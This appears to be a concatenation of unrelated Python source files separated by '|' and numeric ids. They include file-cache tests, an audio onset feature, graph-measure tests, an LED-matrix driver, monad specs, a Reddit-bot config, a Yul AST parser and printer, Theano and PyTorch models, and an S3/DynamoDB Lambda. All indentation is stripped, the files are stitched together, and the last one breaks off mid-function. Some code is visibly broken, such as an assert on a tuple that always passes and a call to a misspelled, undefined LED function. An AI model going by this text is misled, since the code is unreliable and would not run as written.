def test_small_write_around(self):
async def read(url):
async with await self.fs.open(url) as f:
return await f.read()
cases = [('empty_file', b''), ('null', b'\0'), ('small', b'hello world')]
for file, data in cases:
handle = async_to_blocking(self.add_temp_file_from_string(file, data))
expected = async_to_blocking(read(handle))
self.assertEqual(expected, data)
i = 0
cached = self.client._get_file_if_exists(handle)
while cached is None and i < 10:
cached = self.client._get_file_if_exists(handle)
i += 1
self.assertEqual(cached, expected)
def test_small_write_through(self):
cases = [('empty_file2', b''), ('null2', b'\0'), ('small2', b'hello world')]
for file, data in cases:
filename = f'{self.test_path}/{file}'
self.client.write_file(filename, data)
cached = self.client._get_file_if_exists(filename)
self.assertEqual(cached, data)
|
23377
|
import librosa
import numpy as np
from . import base
from . import spectral
class OnsetStrength(base.Computation):
"""
Compute a spectral flux onset strength envelope.
Based on http://librosa.github.io/librosa/generated/librosa.onset.onset_strength.html
Args:
n_mels (int): Number of mel bands to generate.
"""
def __init__(self, n_mels=128, parent=None, name=None):
super(OnsetStrength, self).__init__(left_context=1, right_context=0, parent=parent, name=name)
self.n_mels = n_mels
def compute(self, chunk, sampling_rate, corpus=None, utterance=None):
# Compute mel-spetrogram
power_spec = np.abs(spectral.stft_from_frames(chunk.data.T)) ** 2
mel = np.abs(librosa.feature.melspectrogram(S=power_spec, n_mels=self.n_mels, sr=sampling_rate))
mel_power = librosa.power_to_db(mel)
# Compute onset strengths
oenv = librosa.onset.onset_strength(S=mel_power, center=False)
# Switch dimensions and add dimension to have frames
oenv = oenv.T.reshape(oenv.shape[0], -1)
# Remove context
oenv = oenv[chunk.left_context:oenv.shape[0] - chunk.right_context]
return oenv
|
23381
|
import numpy as np
from graph_tiger.graphs import o4_graph, p4_graph, c4_graph, k4_1_graph, k4_2_graph
from graph_tiger.graphs import two_c4_0_bridge, two_c4_1_bridge, two_c4_2_bridge, two_c4_3_bridge
from graph_tiger.measures import run_measure
def test_measures():
measure_ground_truth = { # graph order: o4, p4, c4, k4_1, c4_0, c4_1, c4_2, c4_3
'node_connectivity': [0, 1, 2, 2, 3, 0, 1, 1, 1],
'edge_connectivity': [0, 1, 2, 2, 3, 0, 1, 1, 1],
'diameter': [None, 3, 2, 2, 1, None, 5, 5, 5],
'average_distance': [None, 1.67, 1.33, 1.17, 1, None, 2.29, 2.29, 2.29],
'average_inverse_distance': [0, 0.72, 0.83, 0.92, 1.0, 0.36, 0.58, 0.58, 0.58],
'average_vertex_betweenness': [0, 4, 3.5, 3.25, 3, 3.5, 11.5, None, None],
'average_edge_betweenness': [0, 3.33, 2.0, 1.4, 1, 2, 7.11, 7.11, 7.11],
'average_clustering_coefficient': [0, 0, 0, 0.83, 1, 0, 0, None, None],
'largest_connected_component': [1, 4, 4, 4, 4, 4, 8, 8, 8],
'spectral_radius': [0, 1.62, 2, 2.56, 3, 2, 2.34, 2.9, 3.65],
'spectral_gap': [0, 1, 2, 2.56, 4, 0, 0.53, 1.19, 2],
'natural_connectivity': [0, 0.65, 0.87, 1.29, 1.67, 0.87, 0.97, 1.28, 1.81],
'spectral_scaling': [None, 7.18, 7.28, 0.17, 0.09, None, None, 7.04, 6.93],
'generalized_robustness_index': [None, 7.18, 7.28, 0.17, 0.09, None, None, 7.04, 6.93],
'algebraic_connectivity': [0, 0.59, 2, 2, 4, 0, 0.29, 0.4, 0.45],
'number_spanning_trees': [0, 1, 4, 8, 16, 0, 16, 32, 48],
'effective_resistance': [np.inf, 10, 5, 4, 3, np.inf, 46, 38, 35.33]
}
graphs = [o4_graph(), p4_graph(), c4_graph(), k4_1_graph(), k4_2_graph(),
two_c4_0_bridge(), two_c4_1_bridge(), two_c4_2_bridge(), two_c4_3_bridge()]
for measure_name, graph_values in measure_ground_truth.items():
for idx, graph in enumerate(graphs):
value = run_measure(graph, measure_name)
if value is not None: value = round(value, 2)
# print(idx, measure_name, value)
assert (value, graph_values[idx])
def main():
test_measures()
if __name__ == '__main__':
main()
|
23385
|
import spidev
columns = [0x1,0x2,0x3,0x4,0x5,0x6,0x7,0x8]
LEDOn = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]
LEDOff = [0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0]
LEDEmoteSmile = [0x0,0x0,0x24,0x0,0x42,0x3C,0x0,0x0]
LEDEmoteSad = [0x0,0x0,0x24,0x0,0x0,0x3C,0x42,0x0]
LEDEmoteTongue = [0x0,0x0,0x24,0x0,0x42,0x3C,0xC,0x0]
LEDEmoteSurprise = [0x0,0x0,0x24,0x0,0x18,0x24,0x24,0x18]
spi = None
def setup(robot_config):
global LEDEmoteSmile
global LEDEmoteSad
global LEDEmoteTongue
global LEDEmoteSuprise
global module
global spi
#LED controlling
spi = spidev.SpiDev()
spi.open(0,0)
#VCC -> RPi Pin 2
#GND -> RPi Pin 6
#DIN -> RPi Pin 19
#CLK -> RPi Pin 23
#CS -> RPi Pin 24
# decoding:BCD
spi.writebytes([0x09])
spi.writebytes([0x00])
# Start with low brightness
spi.writebytes([0x0a])
spi.writebytes([0x03])
# scanlimit; 8 LEDs
spi.writebytes([0x0b])
spi.writebytes([0x07])
# Enter normal power-mode
spi.writebytes([0x0c])
spi.writebytes([0x01])
# Activate display
spi.writebytes([0x0f])
spi.writebytes([0x00])
rotate = robot_config.getint('max7219', 'ledrotate')
if rotate == 180:
LEDEmoteSmile = LEDEmoteSmile[::-1]
LEDEmoteSad = LEDEmoteSad[::-1]
LEDEmoteTongue = LEDEmoteTongue[::-1]
LEDEmoteSurprise = LEDEmoteSurprise[::-1]
SetLED_Off()
def SetLED_On():
for i in range(len(columns)):
spi.xfer([columns[i],LEDOn[i]])
def SetLED_Off():
for i in range(len(columns)):
spi.xfer([columns[i],LEDOff[i]])
def SetLED_E_Smiley():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSmile[i]])
def SetLED_E_Sad():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSad[i]])
def SetLED_E_Tongue():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteTongue[i]])
def SetLED_E_Surprised():
for i in range(len(columns)):
spi.xfer([columns[i],LEDEmoteSurprise[i]])
def SetLED_Low():
# brightness MIN
spi.writebytes([0x0a])
spi.writebytes([0x00])
def SetLED_Med():
#brightness MED
spi.writebytes([0x0a])
spi.writebytes([0x06])
def SetLED_Full():
# brightness MAX
spi.writebytes([0x0a])
spi.writebytes([0x0F])
def move(args):
command = args['command']
if command == 'LED_OFF':
SetLED_Off()
if command == 'LED_FULL':
SetLED_On()
SetLED_Full()
if command == 'LED_MED':
SetLED_On()
SetLED_Med()
if command == 'LED_LOW':
SetLED_On()
SetLED_Low()
if command == 'LED_E_SMILEY':
SetLED_On()
SetLED_E_Smiley()
if command == 'LED_E_SAD':
SetLED_On()
SetLED_E_Sad()
if command == 'LED_E_TONGUE':
SetLED_On()
SetLED_E_Tongue()
if command == 'LED_E_SURPRISED':
SetLED_On()
SetLED_E_Suprised()
|
23457
|
import operator
from amino.either import Left, Right
from amino import Empty, Just, Maybe, List, Either, _
from amino.test.spec_spec import Spec
from amino.list import Lists
class EitherSpec(Spec):
def map(self) -> None:
a = 'a'
b = 'b'
Right(a).map(_ + b).value.should.equal(a + b)
Left(a).map(_ + b).value.should.equal(a)
def optional(self) -> None:
a = 'a'
b = 'b'
Right(a).to_maybe.should.just_contain(a)
Left(a).to_maybe.should.be.a(Empty)
Right(a).to_either(b).should.equal(Right(a))
Left(a).to_either(b).should.equal(Left(a))
def ap2(self) -> None:
a = 'a'
b = 'b'
Right(a).ap2(Right(b), operator.add).should.equal(Right(a + b))
def traverse(self) -> None:
a = 'a'
Right(Just(a)).sequence(Maybe).should.equal(Just(Right(a)))
Left(Just(a)).sequence(Maybe).should.equal(Just(Left(Just(a))))
List(Right(a)).sequence(Either).should.equal(Right(List(a)))
List(Right(a), Left(a)).sequence(Either).should.equal(Left(a))
def fold_m(self) -> None:
def f(z: int, a: int) -> Either[str, int]:
return Right(z + a) if a < 5 else Left('too large')
Lists.range(5).fold_m(Right(8))(f).should.contain(18)
Lists.range(6).fold_m(Right(8))(f).should.be.left
def list_flat_map(self) -> None:
(List(Right(1), Left(2), Right(3)).join).should.equal(List(1, 3))
__all__ = ('EitherSpec',)
|
23471
|
import os
client_id = os.environ['BOT_CLIENT_ID']
client_secret = os.environ['BOT_CLIENT_SECRET']
user_agent = os.environ['BOT_USER_AGENT']
username = os.environ['BOT_USERNAME']
password = os.environ['BOT_PASSWORD']
num_subs = int(os.environ['BOT_SUB_COUNT'])
sub_settings = [[
os.environ['BOT_SUBREDDIT' + i],
int(os.environ['BOT_TOP_DAYS' + i]) if 'BOT_TOP_DAYS' + i in os.environ else None,
int(os.environ['BOT_HOT_DAYS' + i]) if 'BOT_HOT_DAYS' + i in os.environ else None,
int(os.environ['BOT_NEW_DAYS' + i]) if 'BOT_NEW_DAYS' + i in os.environ else None,
int(os.environ['BOT_TOP_NUM_POSTS' + i]) if 'BOT_TOP_NUM_POSTS' + i in os.environ else 1000,
int(os.environ['BOT_HOT_NUM_POSTS' + i]) if 'BOT_HOT_NUM_POSTS' + i in os.environ else 1000,
int(os.environ['BOT_NEW_NUM_POSTS' + i]) if 'BOT_NEW_NUM_POSTS' + i in os.environ else 1000,
int(os.environ['BOT_THRESH' +i]) if 'BOT_THRESH' + i in os.environ else 5,
bool(os.environ['BOT_TEXT_IN_IMAGE' + i]) if 'BOT_TEXT_IN_IMAGE' + i in os.environ else False,
] for i in [str(x) for x in range(num_subs)]]
|
23485
|
from __future__ import annotations
import re
from typing import Union
import warp.yul.ast as ast
from warp.yul.AstVisitor import AstVisitor
from warp.yul.WarpException import WarpException
class AstParser:
def __init__(self, text: str):
self.lines = text.splitlines()
if len(self.lines) == 0:
raise WarpException("Text should not be empty")
self.pos = 0
def parse_typed_name(self) -> ast.TypedName:
tabs = self.get_tabs()
node_type_name = self.get_word(tabs)
assert node_type_name == "TypedName:", "This node should be of type TypedNode"
self.pos += 1
assert self.get_tabs() == tabs + 1, "Wrong indentation"
node_name, node_type = self.get_word(tabs + 1).split(":")
self.pos += 1
return ast.TypedName(name=node_name, type=node_type)
def parse_literal(self) -> ast.Literal:
tabs = self.get_tabs()
assert self.get_word(tabs).startswith(
"Literal:"
), "This node should be of type Literal"
value = self.get_word(tabs + 8)
self.pos += 1
try:
value = int(value)
except ValueError:
pass
return ast.Literal(value=value)
def parse_identifier(self) -> ast.Identifier:
tabs = self.get_tabs()
assert self.get_word(tabs).startswith(
"Identifier:"
), "This node should be of type Identifier"
name = self.get_word(tabs + 11)
self.pos += 1
return ast.Identifier(name=name)
def parse_assignment(self) -> ast.Assignment:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "Assignment:"
), "This node should be of type Assignment"
self.pos += 1
assert self.get_word(tabs + 1) == "Variables:"
self.pos += 1
variables_list = self.parse_list(tabs + 1, self.parse_identifier)
assert self.get_word(tabs + 1) == "Value:"
self.pos += 1
return ast.Assignment(
variable_names=variables_list, value=self.parse_expression()
)
def parse_function_call(self) -> ast.FunctionCall:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "FunctionCall:"
), "This node should be of type FunctionCall"
self.pos += 1
return ast.FunctionCall(
function_name=self.parse_identifier(),
arguments=self.parse_list(tabs, self.parse_expression),
)
def parse_expression_statement(self) -> ast.Statement:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "ExpressionStatement:"
), "This node should be of type ExpressionStatement"
self.pos += 1
return ast.ExpressionStatement(expression=self.parse_expression())
def parse_variable_declaration(self) -> ast.VariableDeclaration:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "VariableDeclaration:"
), "This node should be of type VariableDeclaration"
self.pos += 1
assert self.get_tabs() == tabs + 1
assert self.get_word(tabs + 1) == "Variables:"
self.pos += 1
variables = self.parse_list(tabs + 1, self.parse_typed_name)
assert self.get_tabs() == tabs + 1
word = self.get_word(tabs + 1)
self.pos += 1
assert word.startswith("Value")
if word.endswith("None"):
value = None
else:
value = self.parse_expression()
return ast.VariableDeclaration(variables=variables, value=value)
def parse_block(self) -> ast.Block:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Block:", "This node should be of type Block"
self.pos += 1
return ast.Block(statements=tuple(self.parse_list(tabs, self.parse_statement)))
def parse_function_definition(self) -> ast.FunctionDefinition:
tabs = self.get_tabs()
assert (
self.get_word(tabs) == "FunctionDefinition:"
), "This node should be of type FunctionDefinition"
self.pos += 1
assert self.get_tabs() == tabs + 1 and self.get_word(tabs + 1).startswith(
"Name:"
)
fun_name = self.get_word(tabs + 7)
self.pos += 1
assert self.get_tabs() == tabs + 1 and self.get_word(tabs + 1) == "Parameters:"
self.pos += 1
params = self.parse_list(tabs + 1, self.parse_typed_name)
assert (
self.get_tabs() == tabs + 1
and self.get_word(tabs + 1) == "Return Variables:"
)
self.pos += 1
returns = self.parse_list(tabs + 1, self.parse_typed_name)
assert self.get_tabs() == tabs + 1 and self.get_word(tabs + 1) == "Body:"
self.pos += 1
body = self.parse_block()
return ast.FunctionDefinition(
name=fun_name, parameters=params, return_variables=returns, body=body
)
def parse_if(self) -> ast.If:
tabs = self.get_tabs()
assert self.get_word(tabs) == "If:", "This node should be of type If"
self.pos += 1
condition = self.parse_expression()
body = self.parse_block()
else_body = None
if self.get_tabs() > tabs:
else_body = self.parse_block()
return ast.If(condition=condition, body=body, else_body=else_body)
def parse_case(self) -> ast.Case:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Case:", "This node should be of type Case"
self.pos += 1
try:
value = self.parse_literal()
except AssertionError:
assert (
self.get_tabs() == tabs + 1 and self.get_word(tabs + 1) == "Default"
), "The value must be a literal or None (when it's the default case)"
value = None
self.pos += 1
return ast.Case(value=value, body=self.parse_block())
def parse_switch(self) -> ast.Switch:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Switch:", "This node should be of type Switch"
self.pos += 1
return ast.Switch(
expression=self.parse_expression(),
cases=self.parse_list(tabs, self.parse_case),
)
def parse_for_loop(self) -> ast.ForLoop:
tabs = self.get_tabs()
assert self.get_word(tabs) == "ForLoop:", "This node should be of type ForLoop"
self.pos += 1
return ast.ForLoop(
pre=self.parse_block(),
condition=self.parse_expression(),
post=self.parse_block(),
body=self.parse_block(),
)
def parse_break(self) -> ast.Break:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Break", "This node should be of type Break"
self.pos += 1
return ast.Break()
def parse_continue(self) -> ast.Continue:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Continue", "This node should be of type Continue"
self.pos += 1
return ast.Continue()
def parse_leave(self) -> ast.Leave:
tabs = self.get_tabs()
assert self.get_word(tabs) == "Leave", "This node should be of type Leave"
self.pos += 1
return ast.LEAVE
def parse_node(self) -> ast.Node:
tabs = self.get_tabs()
node_type_name = self.get_word(tabs).split(":")[0]
parser_name = f"parse_{self.get_name(node_type_name)}"
parser = getattr(self, parser_name, None)
if parser is None:
raise WarpException("Wrong node type name!")
return parser()
def parse_statement(self) -> ast.Statement:
statements = [
"ExpressionStatement",
"Assignment",
"VariableDeclaration",
"FunctionDefinition",
"If",
"Switch",
"ForLoop",
"Break",
"Continue",
"Leave",
"Block",
]
tabs = self.get_tabs()
node_type_name = self.get_word(tabs).split(":")[0]
assert node_type_name in statements, "Not a valid statement"
return ast.assert_statement(self.parse_node())
def parse_expression(self) -> ast.Expression:
tabs = self.get_tabs()
node_type_name = self.get_word(tabs).split(":")[0]
assert node_type_name in [
"Literal",
"Identifier",
"FunctionCall",
], "Node type must be an expression"
return ast.assert_expression(self.parse_node())
def parse_list(self, tabs, parser):
items = []
while self.pos < len(self.lines) and self.get_tabs() > tabs:
item = parser()
items.append(item)
return items
def get_tabs(self):
tabs = 0
if self.pos < len(self.lines):
for c in self.lines[self.pos]:
if not c == "\t":
break
tabs += 1
else:
raise WarpException(
"Lines are not supposed to be filled only with tabs"
)
return tabs
def get_word(self, start: int) -> str:
return self.lines[self.pos][start:]
def get_name(self, name):
name = "_".join(re.findall("[A-Z][^A-Z]*", name))
return name.lower()
class YulPrinter(AstVisitor):
def format(self, node: ast.Node, tabs: int = 0) -> str:
return self.visit(node, tabs)
def visit_typed_name(self, node: ast.TypedName, tabs: int = 0) -> str:
return f"{node.name}"
def visit_literal(self, node: ast.Literal, tabs: int = 0) -> str:
return f"{node.value}"
def visit_identifier(self, node: ast.Identifier, tabs: int = 0) -> str:
return f"{node.name}"
def visit_assignment(self, node: ast.Assignment, tabs: int = 0) -> str:
variables = ", ".join(self.visit_list(node.variable_names))
value = self.visit(node.value, 0)
return f"{variables} := {value}"
def visit_function_call(self, node: ast.FunctionCall, tabs: int = 0) -> str:
name = self.visit(node.function_name)
args = ", ".join(self.visit_list(node.arguments))
return f"{name}({args})"
def visit_expression_statement(
self, node: ast.ExpressionStatement, tabs: int = 0
) -> str:
return self.visit(node.expression, tabs)
def visit_variable_declaration(
self, node: ast.VariableDeclaration, tabs: int = 0
) -> str:
variables = ", ".join(self.visit_list(node.variables))
value = ""
if node.value is not None:
value = f" := {self.visit(node.value)}"
return f"let {variables}{value}"
def visit_block(self, node: ast.Block, tabs: int = 0) -> str:
open_block = "{"
close_block = "}"
if self.is_short(node.statements):
statements = "".join(self.visit_list(node.statements))
return " ".join([open_block, statements, close_block])
statements = self.visit_list(node.statements, tabs + 1)
statements = ["\t" * (tabs + 1) + stmt for stmt in statements]
statements = "\n".join(statements)
close_block = "\t" * tabs + close_block
res = "\n".join([open_block, statements, close_block])
return res
def visit_function_definition(
self, node: ast.FunctionDefinition, tabs: int = 0
) -> str:
parameters = ", ".join(self.visit_list(node.parameters, 0))
ret_vars = ", ".join(self.visit_list(node.return_variables, 0))
body = self.visit(node.body, tabs)
res = f"function {node.name}({parameters})"
if len(node.return_variables) > 0:
res += f" -> {ret_vars}"
res += f" {body}"
return res
def visit_if(self, node: ast.If, tabs: int = 0) -> str:
res = f"if {self.visit(node.condition)} "
res += self.visit(node.body, tabs)
if node.else_body is not None:
res += "\n" + "\t" * tabs + "else "
res += self.visit(node.else_body, tabs)
return res
def visit_case(self, node: ast.Case, tabs: int = 0) -> str:
res = "\t" * tabs
if node.value is not None:
res += f"case {self.visit(node.value)} "
else:
res += "default "
res += self.visit(node.body, tabs)
return res
def visit_switch(self, node: ast.Switch, tabs: int = 0) -> str:
res = f"switch {self.visit(node.expression)}\n"
res += "\n".join(self.visit_list(node.cases, tabs))
return res
def visit_for_loop(self, node: ast.ForLoop, tabs: int = 0) -> str:
res = "for "
res += self.visit(node.pre, tabs)
res += f" {self.visit(node.condition)} "
res += self.visit(node.post, tabs)
res += f"\n{self.visit(node.body, tabs)}"
return res
def visit_break(self, node: ast.Break, tabs: int = 0) -> str:
return "break"
def visit_continue(self, node: ast.Continue, tabs: int = 0) -> str:
return "continue"
def visit_leave(self, node: ast.Leave, tabs: int = 0) -> str:
return "leave"
def is_short(self, stmts: tuple) -> bool:
if len(stmts) == 0:
return True
return len(stmts) == 1 and type(stmts[0]).__name__ not in [
"Block",
"FunctionDefinition",
"If",
"Switch",
"ForLoop",
]
|
23495
|
import theano
import theano.tensor as T
from theano.sandbox.rng_mrg import MRG_RandomStreams
from theano.tensor.nnet.conv import conv2d
from theano.tensor.signal.downsample import max_pool_2d
from theano.tensor.shared_randomstreams import RandomStreams
import numpy as np
from toolbox import *
from modelbase import *
import itertools
class FFN_ace(ModelSLBase):
"""
Auto-classifier-encoder (Georgiev, 2015)
"""
def save(self):
if not os.path.exists('savedmodels\\'):
os.makedirs('savedmodels\\')
self.params.save(self.filename)
def __init__(self, data, hp):
super(FFN_ace, self).__init__(self.__class__.__name__, data, hp)
# batch_size: 10000; learning_rate = 0.0015; lr_halflife = 200, 500
self.epsilon = 0.0001
self.params = Parameters()
self.shared_vars = Parameters()
n_x = self.data['n_x']
n_y = self.data['n_y']
n_h1 = 1200
n_h2 = 1000
n_h3 = 800
n_h4 = 800
scale = hp.init_scale
if hp.load_model and os.path.isfile(self.filename):
self.params.load(self.filename)
else:
with self.params:
w_h = shared_normal((n_x, n_h1), scale=scale)
b_h = shared_zeros((n_h1,))
w_h2 = shared_normal((n_h1, n_h2), scale=scale)
b_h2 = shared_zeros((n_h2,))
w_h3 = shared_normal((n_h2, n_h3), scale=scale)
b_h3 = shared_zeros((n_h3,))
w_h4 = shared_normal((n_h3, n_h4), scale=scale)
b_h4 = shared_zeros((n_h4,))
w_o = shared_normal((n_h4, n_y), scale=scale)
def batch_norm(h):
m = T.mean(h, axis=0, keepdims=True)
std = T.sqrt(T.var(h, axis=0, keepdims=True) + self.epsilon)
h = (h - m) / std
return h
def model(X, params, p_drop_input, p_drop_hidden):
X_noise = X + gaussian(X.shape, p_drop_input)
h = batch_norm(dropout(rectify(T.dot(X_noise, params.w_h) + params.b_h), p_drop_hidden))
# Dual reconstruction error
phx = T.nnet.sigmoid(T.dot(h, T.dot(h.T, X_noise)) / self.hp.batch_size)
log_phx = T.nnet.binary_crossentropy(phx, X_noise).sum()
h2 = dropout(rectify(T.dot(h, params.w_h2) + params.b_h2), p_drop_hidden)
h3 = batch_norm(dropout(rectify(T.dot(h2, params.w_h3) + params.b_h3), p_drop_hidden))
h4 = dropout(rectify(T.dot(h3, params.w_h4) + params.b_h4), p_drop_hidden)
py_x = softmax(T.dot(h4, params.w_o))
return [py_x, log_phx]
noise_py_x, cost_recon = model(self.X, self.params, 0.2, 0.5)
cost_y2 = -T.sum(self.Y * T.log(noise_py_x))
cost = cost_y2 + cost_recon
pyx, _ = model(self.X, self.params, 0., 0.)
map_pyx = T.argmax(pyx, axis=1)
error_map_pyx = T.sum(T.neq(map_pyx, T.argmax(self.Y, axis=1)))
self.compile(cost, error_map_pyx)
|
23499
|
class AveragingBucketUpkeep:
def __init__(self):
self.numer = 0.0
self.denom = 0
def add_cost(self, cost):
self.numer += cost
self.denom += 1
return self.numer / self.denom
def rem_cost(self, cost):
self.numer -= cost
self.denom -= 1
if self.denom == 0:
return 0
return self.numer / self.denom
|
23570
|
from ...app.models import App
from ...webhook.event_types import WebhookEventType
def test_qs_for_event_type(payment_app):
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 1
assert qs[0] == payment_app
def test_qs_for_event_type_no_payment_permissions(payment_app):
payment_app.permissions.first().delete()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
def test_qs_for_event_type_inactive_app(payment_app):
payment_app.is_active = False
payment_app.save()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
def test_qs_for_event_type_no_webhook_event(payment_app):
webhook = payment_app.webhooks.first()
event = webhook.events.filter(event_type=WebhookEventType.PAYMENT_AUTHORIZE).first()
event.delete()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
def test_qs_for_event_type_inactive_webhook(payment_app):
webhook = payment_app.webhooks.first()
webhook.is_active = False
webhook.save()
qs = App.objects.for_event_type(WebhookEventType.PAYMENT_AUTHORIZE)
assert len(qs) == 0
|
23605
|
from typing import List
from parser import parse_bytes, split_bytes_from_lines, get_bytes, parse_instruction_set, wrap_parsed_set
from reader import dump_file_hex_with_locs
class Translator:
"""
Class handling file translations from *.mpy to hex dumps and opcodes
"""
def __init__(self, file: str):
"""
Create new translator
:param file: location of the file
"""
self.file = file
def get_file_hex(self):
"""
Get a full hex dump of the file
:return:
"""
return dump_file_hex_with_locs(self.file)
def get_file_hex_at(self, _from: str, _to: str):
"""
Get a byte dump at a specified location
:param _from: from address
:param _to: to address
:return: bytes from address {_from} to address {_to}
"""
return parse_bytes(self.get_file_hex(), _from, _to)
def get_file(self):
"""
Get the file name
:return:
"""
return self.file
def get_magic(self) -> str:
"""
Get the magic number
:return:
"""
return "".join(self.get_all_bytes()[0][:8])
def get_all_bytes(self):
"""
Get all of the bytes
:return: all of the bytes
"""
return get_bytes(self.get_file_hex().split("\n"))
def get_split_bytes(self) -> List[List[str]]:
"""
Get all of the bytes per line
:return: bytes in list form
"""
split = split_bytes_from_lines(self.get_all_bytes())
split[0] = split[0][4:]
return split
def get_bytes_at(self, _from: str, _to: str) -> List[List[str]]:
"""
Get the bytes between the specified locations
:param _from: start address
:param _to: end address
:return: bytes
"""
return split_bytes_from_lines(self.get_file_hex_at(_from, _to))
def get_instruction_set(self) -> List[str]:
"""
Get the file's instruction set
:return: set
"""
bl = self.get_split_bytes()
# offset of 8, start at first BC_BASE_RESERVED
list_with_offset = bl[0][4:]
_bytes = self.__flatten([list_with_offset, bl[1]])
_set = parse_instruction_set(_bytes)
return wrap_parsed_set(_set)
def get_instructions_at(self, _from: str, _to: str) -> List[str]:
"""
Get the instructions between addresses
:param _from: start address
:param _to: end address
:return: instructions
"""
_bytes = self.__flatten(self.get_bytes_at(_from, _to))
_set = parse_instruction_set(_bytes)
return wrap_parsed_set(_set)
def __flatten(self, _list):
# Lambda replaced by def flatten due to E731
return [item for sublist in _list for item in sublist]
|
23607
|
import sys
from ctypes import *
def test_getattr():
class Stuff(Union):
_fields_ = [('x', c_char), ('y', c_int)]
stuff = Stuff()
stuff.y = ord('x') | (ord('z') << 24)
if sys.byteorder == 'little':
assert stuff.x == b'x'
else:
assert stuff.x == b'z'
def test_union_of_structures():
class Stuff(Structure):
_fields_ = [('x', c_int)]
class Stuff2(Structure):
_fields_ = [('x', c_int)]
class UnionofStuff(Union):
_fields_ = [('one', Stuff),
('two', Stuff2)]
u = UnionofStuff()
u.one.x = 3
assert u.two.x == 3
|
23609
|
import json
import boto3 # Amazon S3 client library
s3 = boto3.resource('s3')
dynamodb = boto3.resource('dynamodb')
problems_table = dynamodb.Table('codebreaker-problems')
bucket = s3.Bucket('codebreaker-testdata')
def lambda_handler(event, context):
problemName = event['problemName']
testcaseCount = 0
for obj in bucket.objects.filter(Prefix="{0}/".format(problemName)):
testcaseCount += 1
print(testcaseCount)
problems_table.update_item(
Key = {'problemName':problemName},
UpdateExpression = f'set #b=:a',
ExpressionAttributeValues={':a':int(testcaseCount/2)},
ExpressionAttributeNames={'#b':'testcaseCount'}
)
return {
'statusCode': 200,
'testcaseCount':testcaseCount
}
|
23614
|
import torch
import torch.nn as nn
import torchvision.models as models
from torch.nn.utils.rnn import pack_padded_sequence as pack
from torch.nn.utils.rnn import pad_packed_sequence as unpack
from torch.autograd import Variable
class EncoderCNN(nn.Module):
def __init__(self, embed_size):
"""Load the pretrained ResNet-152 and replace top fc layer."""
super(EncoderCNN, self).__init__()
resnet = models.resnet152(pretrained=True)
modules = list(resnet.children())[:-1] # delete the last fc layer.
self.resnet = nn.Sequential(*modules)
self.linear = nn.Linear(resnet.fc.in_features, embed_size)
self.bn = nn.BatchNorm1d(embed_size, momentum=0.01)
self.init_weights()
def init_weights(self):
"""Initialize the weights."""
self.linear.weight.data.normal_(0.0, 0.02)
self.linear.bias.data.fill_(0)
def forward(self, images):
"""Extract the image feature vectors."""
features = self.resnet(images)
features = Variable(features.data)
features = features.view(features.size(0), -1)
features = self.bn(self.linear(features))
return features
class LayoutEncoder(nn.Module):
def __init__(self, layout_encoding_size, hidden_size, vocab_size, num_layers):
"""Set the hyper-parameters and build the layers."""
super(LayoutEncoder, self).__init__()
self.label_encoder = nn.Embedding(vocab_size, layout_encoding_size)
self.location_encoder = nn.Linear(4, layout_encoding_size)
self.lstm = nn.LSTM(layout_encoding_size, hidden_size, num_layers, batch_first=True)
self.init_weights()
def init_weights(self):
"""Initialize weights."""
self.label_encoder.weight.data.uniform_(-0.1, 0.1)
self.location_encoder.weight.data.uniform_(-0.1, 0.1)
self.location_encoder.bias.data.fill_(0)
def forward(self, label_seqs, location_seqs, lengths):
# sort label sequences and location sequences in batch dimension according to length
batch_idx = sorted(range(len(lengths)), key=lambda k: lengths[k], reverse=True)
reverse_batch_idx = torch.LongTensor([batch_idx.index(i) for i in range(len(batch_idx))])
lens_sorted = sorted(lengths, reverse=True)
label_seqs_sorted = torch.index_select(label_seqs, 0, torch.LongTensor(batch_idx))
location_seqs_sorted = torch.index_select(location_seqs, 0, torch.LongTensor(batch_idx))
# assert torch.equal(torch.index_select(label_seqs_sorted, 0, reverse_batch_idx), label_seqs)
# assert torch.equal(torch.index_select(location_seqs_sorted, 0, reverse_batch_idx), location_seqs)
if torch.cuda.is_available():
reverse_batch_idx = reverse_batch_idx.cuda()
label_seqs_sorted = label_seqs_sorted.cuda()
location_seqs_sorted = location_seqs_sorted.cuda()
# create Variables
label_seqs_sorted_var = Variable(label_seqs_sorted, requires_grad=False)
location_seqs_sorted_var = Variable(location_seqs_sorted, requires_grad=False)
# encode label sequences
label_encoding = self.label_encoder(label_seqs_sorted_var)
# encode location sequences
location_seqs_sorted_var = location_seqs_sorted_var.view(-1, 4)
location_encoding = self.location_encoder(location_seqs_sorted_var)
location_encoding = location_encoding.view(label_encoding.size(0), -1, location_encoding.size(1))
# layout encoding - batch_size x max_seq_len x embed_size
layout_encoding = label_encoding + location_encoding
packed = pack(layout_encoding, lens_sorted, batch_first=True)
hiddens, _ = self.lstm(packed)
# unpack hiddens and get last hidden vector
hiddens_unpack = unpack(hiddens, batch_first=True)[0] # batch_size x max_seq_len x embed_size
last_hidden_idx = torch.zeros(hiddens_unpack.size(0), 1, hiddens_unpack.size(2)).long()
for i in range(hiddens_unpack.size(0)):
last_hidden_idx[i, 0, :] = lens_sorted[i] - 1
if torch.cuda.is_available():
last_hidden_idx = last_hidden_idx.cuda()
last_hidden = torch.gather(hiddens_unpack, 1, Variable(last_hidden_idx, requires_grad=False)) # batch_size x 1 x embed_size
last_hidden = torch.squeeze(last_hidden, 1) # batch_size x embed_size
# convert back to original batch order
